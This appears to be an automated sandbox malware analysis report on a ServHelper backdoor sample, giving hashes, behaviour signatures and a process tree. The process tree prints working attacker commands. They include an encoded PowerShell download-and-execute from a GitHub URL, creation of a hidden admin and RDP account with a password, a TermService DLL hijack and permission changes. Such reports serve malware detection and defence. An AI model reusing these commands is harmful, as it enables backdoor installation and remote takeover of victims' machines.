Analysis
-
max time kernel
123s -
max time network
130s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
24-08-2021 04:58
Static task
static1
Behavioral task
behavioral1
Sample
1aa9dda1b9b413444b0668500611c7f3.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
1aa9dda1b9b413444b0668500611c7f3.exe
Resource
win10v20210408
General
-
Target
1aa9dda1b9b413444b0668500611c7f3.exe
-
Size
7.2MB
-
MD5
1aa9dda1b9b413444b0668500611c7f3
-
SHA1
d980ac83bf107df1a7510ad94304a7e364d927a5
-
SHA256
02031c62d916cdd41d26a271e93ec5b06eabfa910187207b02ead07fd480c2a9
-
SHA512
37a301fd61c42c10f774950826469f215a20a24d783316febfeafd0fa06d88f536daa4d5d10153fd1ec42cc778d87716fe5b4bb9782c03e86a4e3b336e9efd53
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 14 1304 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1684 Uso.exe.com 556 Uso.exe.com 1520 Uso.exe.com -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 1536 icacls.exe 1812 icacls.exe 1148 icacls.exe 2028 icacls.exe 1304 icacls.exe 1320 icacls.exe 568 takeown.exe 1832 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00040000000130fc-206.dat upx behavioral1/files/0x00050000000130fd-207.dat upx -
Deletes itself 1 IoCs
pid Process 1604 powershell.exe -
Loads dropped DLL 5 IoCs
pid Process 1428 cmd.exe 1684 Uso.exe.com 556 Uso.exe.com 2016 Process not Found 2016 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 1832 icacls.exe 1536 icacls.exe 1812 icacls.exe 1148 icacls.exe 2028 icacls.exe 1304 icacls.exe 1320 icacls.exe 568 takeown.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 556 set thread context of 1520 556 Uso.exe.com 37 -
Drops file in Windows directory 21 IoCs
description ioc Process File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c1e34e-f8f1-40e3-9e34-d2bc60847978 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7851d9f8-5a94-4f19-abbc-9e8754f2820b powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_590079ea-d8ab-4b5e-8331-794979062022 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8488ae52-0de2-4204-94c6-5ac571d06aae powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KBIT5YP27TKMSI74A9CW.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_93327922-f4a0-4fd5-8423-0f8106e1b855 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a704ef83-0bb9-44e2-b4a7-67d84b238768 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d4f4b9bc-e8b7-414b-8df1-a0caa47c56af powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_efee7dc4-21f0-44af-b875-9268496691b1 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_93423796-147b-49e7-8764-f1426d3b4079 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_852a90e6-f7a1-42e9-b4a4-145948992680 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd7fe452-a2c5-417f-a5a4-6a8ca20a6b82 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 5099d058a498d701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1944 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Uso.exe.com Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Uso.exe.com -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 420 PING.EXE -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1604 powershell.exe 1604 powershell.exe 1564 powershell.exe 1564 powershell.exe 292 powershell.exe 292 powershell.exe 1444 powershell.exe 1444 powershell.exe 1604 powershell.exe 1604 powershell.exe 1604 powershell.exe 1304 powershell.exe 1304 powershell.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 460 Process not Found 2016 Process not Found 2016 Process not Found -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1520 Uso.exe.com Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 1564 powershell.exe Token: SeDebugPrivilege 292 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeRestorePrivilege 1536 icacls.exe Token: SeAssignPrimaryTokenPrivilege 324 WMIC.exe Token: SeIncreaseQuotaPrivilege 324 WMIC.exe Token: SeAuditPrivilege 324 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 324 WMIC.exe Token: SeIncreaseQuotaPrivilege 324 WMIC.exe Token: SeAuditPrivilege 324 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1708 WMIC.exe Token: SeIncreaseQuotaPrivilege 1708 WMIC.exe Token: SeAuditPrivilege 1708 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1708 WMIC.exe Token: SeIncreaseQuotaPrivilege 1708 WMIC.exe Token: SeAuditPrivilege 1708 WMIC.exe Token: SeDebugPrivilege 1304 powershell.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1684 Uso.exe.com 1684 Uso.exe.com 1684 Uso.exe.com 556 Uso.exe.com 556 Uso.exe.com 556 Uso.exe.com -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1684 Uso.exe.com 1684 Uso.exe.com 1684 Uso.exe.com 556 Uso.exe.com 556 Uso.exe.com 556 Uso.exe.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 792 wrote to memory of 1256 792 1aa9dda1b9b413444b0668500611c7f3.exe 29 PID 792 wrote to memory of 1256 792 1aa9dda1b9b413444b0668500611c7f3.exe 29 PID 792 wrote to memory of 1256 792 1aa9dda1b9b413444b0668500611c7f3.exe 29 PID 792 wrote to memory of 1256 792 1aa9dda1b9b413444b0668500611c7f3.exe 29 PID 792 wrote to memory of 1444 792 1aa9dda1b9b413444b0668500611c7f3.exe 30 PID 792 wrote to memory of 1444 792 1aa9dda1b9b413444b0668500611c7f3.exe 30 PID 792 wrote to memory of 1444 792 1aa9dda1b9b413444b0668500611c7f3.exe 30 PID 792 wrote to memory of 1444 792 1aa9dda1b9b413444b0668500611c7f3.exe 30 PID 1444 wrote to memory of 1428 1444 cmd.exe 32 PID 1444 wrote to memory of 1428 1444 cmd.exe 32 PID 1444 wrote to memory of 1428 1444 cmd.exe 32 PID 1444 wrote to memory of 1428 1444 cmd.exe 32 PID 1428 wrote to memory of 1628 1428 cmd.exe 33 PID 1428 wrote to memory of 1628 1428 cmd.exe 33 PID 1428 wrote to memory of 1628 1428 cmd.exe 33 PID 1428 wrote to memory of 1628 1428 cmd.exe 33 PID 1428 wrote to memory of 1684 1428 cmd.exe 34 PID 1428 wrote to memory of 1684 1428 cmd.exe 34 PID 1428 wrote to memory of 1684 1428 cmd.exe 34 PID 1428 wrote to memory of 1684 1428 cmd.exe 34 PID 1428 wrote to memory of 420 1428 cmd.exe 35 PID 1428 wrote to memory of 420 1428 cmd.exe 35 PID 1428 wrote to memory of 420 1428 cmd.exe 35 PID 1428 wrote to memory of 420 1428 cmd.exe 35 PID 1684 wrote to memory of 556 1684 Uso.exe.com 36 PID 1684 wrote to memory of 556 1684 Uso.exe.com 36 PID 1684 wrote to memory of 556 1684 Uso.exe.com 36 PID 556 wrote to memory of 1520 556 Uso.exe.com 37 PID 556 wrote to memory of 1520 556 Uso.exe.com 37 PID 556 wrote to memory of 1520 556 Uso.exe.com 37 PID 556 wrote to memory of 1520 556 Uso.exe.com 37 PID 556 wrote to memory of 1520 556 Uso.exe.com 37 PID 1520 wrote to memory of 1604 1520 Uso.exe.com 39 PID 1520 wrote to memory of 1604 1520 Uso.exe.com 39 PID 1520 wrote to memory of 1604 1520 Uso.exe.com 39 PID 1604 wrote to memory of 528 1604 powershell.exe 41 PID 1604 wrote to memory of 528 1604 powershell.exe 41 PID 1604 wrote to memory of 528 1604 powershell.exe 41 PID 528 wrote to memory of 924 528 csc.exe 42 PID 528 wrote to memory of 924 528 csc.exe 42 PID 528 wrote to memory of 924 528 csc.exe 42 PID 1604 wrote to memory of 1564 1604 powershell.exe 43 PID 1604 wrote to memory of 1564 1604 powershell.exe 43 PID 1604 wrote to memory of 1564 1604 powershell.exe 43 PID 1604 wrote to memory of 292 1604 powershell.exe 45 PID 1604 wrote to memory of 292 1604 powershell.exe 45 PID 1604 wrote to memory of 292 1604 powershell.exe 45 PID 1604 wrote to memory of 1444 1604 powershell.exe 47 PID 1604 wrote to memory of 1444 1604 powershell.exe 47 PID 1604 wrote to memory of 1444 1604 powershell.exe 47 PID 1604 wrote to memory of 568 1604 powershell.exe 49 PID 1604 wrote to memory of 568 1604 powershell.exe 49 PID 1604 wrote to memory of 568 1604 powershell.exe 49 PID 1604 wrote to memory of 1832 1604 powershell.exe 50 PID 1604 wrote to memory of 1832 1604 powershell.exe 50 PID 1604 wrote to memory of 1832 1604 powershell.exe 50 PID 1604 wrote to memory of 1536 1604 powershell.exe 51 PID 1604 wrote to memory of 1536 1604 powershell.exe 51 PID 1604 wrote to memory of 1536 1604 powershell.exe 51 PID 1604 wrote to memory of 1812 1604 powershell.exe 52 PID 1604 wrote to memory of 1812 1604 powershell.exe 52 PID 1604 wrote to memory of 1812 1604 powershell.exe 52 PID 1604 wrote to memory of 1148 1604 powershell.exe 53 PID 1604 wrote to memory of 1148 1604 powershell.exe 53
Processes
-
C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe"C:\Users\Admin\AppData\Local\Temp\1aa9dda1b9b413444b0668500611c7f3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"2⤵PID:1256
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Bianchezza.xltx2⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\SysWOW64\cmd.execmd3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1428 -
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^neXfkAonzMgXVmZcOdbhYtXinpUsiRQPwpGkvuIPGbsmTRiWdNhKCZQztQQwGRdBWnVLTOZIHIGBMnhHwYqzEyjezjuGfHoPuPCcVveCOErUagHFCoZIRXXQkTsHHzzqmRcWVSM$" Veda.xltx4⤵PID:1628
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.comUso.exe.com B4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com B5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:556 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'7⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0hwfdrms\0hwfdrms.cmdline"8⤵
- Suspicious use of WriteProcessMemory
PID:528 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11EB.tmp" "c:\Users\Admin\AppData\Local\Temp\0hwfdrms\CSC94084A0813C4B92B670F7277E39339.TMP"9⤵PID:924
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:568
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1832
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1812
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1148
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2028
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1304
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1320
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f8⤵PID:1804
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f8⤵
- Modifies registry key
PID:1944
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f8⤵PID:904
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add8⤵PID:960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add9⤵PID:604
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr8⤵PID:1340
-
C:\Windows\system32\cmd.execmd /c net start rdpdr9⤵PID:1012
-
C:\Windows\system32\net.exenet start rdpdr10⤵PID:864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr11⤵PID:1324
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService8⤵PID:916
-
C:\Windows\system32\cmd.execmd /c net start TermService9⤵PID:1436
-
C:\Windows\system32\net.exenet start TermService10⤵PID:300
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService11⤵PID:972
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f8⤵PID:816
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f8⤵PID:916
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping MRBKYMNO -n 304⤵
- Runs ping.exe
PID:420
-
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵PID:568
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵PID:1120
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:1032
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc xxaIqIFQ /add1⤵PID:1728
-
C:\Windows\system32\net.exenet.exe user wgautilacc xxaIqIFQ /add2⤵PID:672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc xxaIqIFQ /add3⤵PID:1780
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵PID:1064
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵PID:904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:844
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:1016
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:1708
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:604
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵PID:1812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:1120
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc xxaIqIFQ1⤵PID:1380
-
C:\Windows\system32\net.exenet.exe user wgautilacc xxaIqIFQ2⤵PID:1684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc xxaIqIFQ3⤵PID:672
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1200
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:324
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1784
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1032
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-